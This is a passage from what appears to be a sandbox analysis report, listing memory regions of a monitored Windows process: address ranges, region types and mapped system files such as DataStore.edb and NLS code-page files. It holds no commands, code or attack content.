0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 666 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 667 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 668 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 669 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 670 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 671 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 672 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 673 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 674 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 675 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 676 start_va = 0x4a00000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 677 start_va = 0x4a80000 end_va = 0x4a80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 678 start_va = 0x4a90000 end_va = 0x4b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 679 start_va = 0x4b90000 end_va = 0x4bddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 680 start_va = 0x4be0000 end_va = 0x4beffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 681 start_va = 0x4bf0000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 682 start_va = 0x4c00000 end_va = 0x4c0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 683 start_va = 0x4c10000 end_va = 0x4c11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 684 start_va = 0x4c20000 end_va = 0x4c26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 685 start_va = 0x4c30000 end_va = 0x4c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c30000" filename = "" Region: id = 686 start_va = 0x4c40000 end_va = 0x4c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c40000" filename = "" Region: id = 687 start_va = 0x4c50000 end_va = 0x4c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c50000" filename = "" Region: id = 688 start_va = 0x4c60000 end_va = 0x4c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 689 start_va = 0x4c70000 end_va = 0x4c7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 690 start_va = 0x4c80000 end_va = 0x4c8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c80000" filename = "" Region: id = 691 start_va = 0x4c90000 end_va = 0x4c9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 692 start_va = 0x4ca0000 end_va = 0x4caffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 693 start_va = 0x4cb0000 end_va = 0x4cb1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 694 start_va = 0x4cc0000 end_va = 0x4ccffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 695 start_va = 0x4cd0000 end_va = 0x4cdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 696 start_va = 0x4ce0000 end_va = 0x4ce4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 697 start_va = 0x4cf0000 end_va = 0x4cfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 698 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 699 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 700 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 701 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 702 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 703 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 704 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 705 start_va = 0x5400000 end_va = 0x540ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 706 start_va = 0x5410000 end_va = 0x541ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 707 start_va = 0x5420000 end_va = 0x542ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 708 start_va = 0x5430000 end_va = 0x543ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 709 start_va = 0x5440000 end_va = 0x544ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 710 start_va = 0x5450000 end_va = 0x545ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 711 start_va = 0x5460000 end_va = 0x546ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 712 start_va = 0x5470000 end_va = 0x547ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 713 start_va = 0x5480000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 714 start_va = 0x5500000 end_va = 0x557ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 715 start_va = 0x5580000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 716 start_va = 0x5600000 end_va = 0x560ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 717 start_va = 0x5610000 end_va = 0x561ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 718 start_va = 0x5620000 end_va = 0x5626fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005620000" filename = "" Region: id = 719 start_va = 0x5630000 end_va = 0x572ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 720 start_va = 0x5730000 end_va = 0x573ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 721 start_va = 0x5740000 end_va = 0x574ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 722 start_va = 0x5750000 end_va = 0x575ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 723 start_va = 0x5760000 end_va = 0x576ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 724 start_va = 0x5770000 end_va = 0x577ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 725 start_va = 0x5780000 end_va = 0x578ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 726 start_va = 0x5790000 end_va = 0x579ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 727 start_va = 0x57a0000 end_va = 0x57affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 728 start_va = 0x57b0000 end_va = 0x57c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 729 start_va = 0x57d0000 end_va = 0x57e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 730 start_va = 0x57f0000 end_va = 0x57fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 731 start_va = 0x5800000 end_va = 0x5806fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 732 start_va = 0x5810000 end_va = 0x590ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005810000" filename = "" Region: id = 733 start_va = 0x5910000 end_va = 0x591ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 734 start_va = 0x5920000 end_va = 0x592ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 735 start_va = 0x5930000 end_va = 0x593ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 736 start_va = 0x5940000 end_va = 0x594ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 737 start_va = 0x5950000 end_va = 0x595ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 738 start_va = 0x5960000 end_va = 0x596ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 739 start_va = 0x5970000 end_va = 0x597ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 740 start_va = 0x5980000 end_va = 0x598ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 741 start_va = 0x5990000 end_va = 0x599ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 742 start_va = 0x59a0000 end_va = 0x59a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059a0000" filename = "" Region: id = 743 start_va = 0x59b0000 end_va = 0x5aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 744 start_va = 0x5ab0000 end_va = 0x5baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ab0000" filename = "" Region: id = 745 start_va = 0x5bb0000 end_va = 0x5c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 746 start_va = 0x5c30000 end_va = 0x5d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c30000" filename = "" Region: id = 747 start_va = 0x5d30000 end_va = 0x5e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d30000" filename = "" Region: id = 748 start_va = 0x5e30000 end_va = 0x5e40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 749 start_va = 0x5e50000 end_va = 0x5e60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 750 start_va = 0x5e70000 end_va = 0x5e76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 751 start_va = 0x5e80000 end_va = 0x5e90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 752 start_va = 0x5ea0000 end_va = 0x5eb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 753 start_va = 0x5ec0000 end_va = 0x5ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 754 start_va = 0x5ee0000 end_va = 0x5ef0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 755 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 756 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 757 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 758 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 759 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 760 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 761 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 762 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 763 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 764 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 765 start_va = 0x6900000 end_va = 0x690ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 766 start_va = 0x6910000 end_va = 0x691ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 767 start_va = 0x6920000 end_va = 0x692ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 768 start_va = 0x6930000 end_va = 0x693ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 769 start_va = 0x6940000 end_va = 0x694ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 770 start_va = 0x6950000 end_va = 0x695ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 771 start_va = 0x6960000 end_va = 0x696ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 772 start_va = 0x6970000 end_va = 0x697ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 773 start_va = 0x6980000 end_va = 0x698ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 774 start_va = 0x6990000 end_va = 0x699ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 775 start_va = 0x69a0000 end_va = 0x69affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 776 start_va = 0x69b0000 end_va = 0x69bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 777 start_va = 0x69c0000 end_va = 0x69cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 778 start_va = 0x69d0000 end_va = 0x69dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 779 start_va = 0x69e0000 end_va = 0x69effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 780 start_va = 0x69f0000 end_va = 0x69fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 781 start_va = 0x6a00000 end_va = 0x6a0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 782 start_va = 0x6a10000 end_va = 0x6a1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 783 start_va = 0x6a20000 end_va = 0x6a2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 784 start_va = 0x6a30000 end_va = 0x6a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 785 start_va = 0x6a40000 end_va = 0x6a4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 786 start_va = 0x6a70000 end_va = 0x6a7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 787 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 788 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 789 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 790 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 791 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 792 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 793 start_va = 0x7100000 end_va = 0x7127fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 794 start_va = 0x7130000 end_va = 0x7160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 795 start_va = 0x7170000 end_va = 0x7180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 796 start_va = 0x7190000 end_va = 0x71c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 797 start_va = 0x71d0000 end_va = 0x7200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 798 start_va = 0x7210000 end_va = 0x721ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 799 start_va = 0x7220000 end_va = 0x722ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 800 start_va = 0x7230000 end_va = 0x723ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 801 start_va = 0x7240000 end_va = 0x724ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 802 start_va = 0x7250000 end_va = 0x725ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 803 start_va = 0x7260000 end_va = 0x726ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 804 start_va = 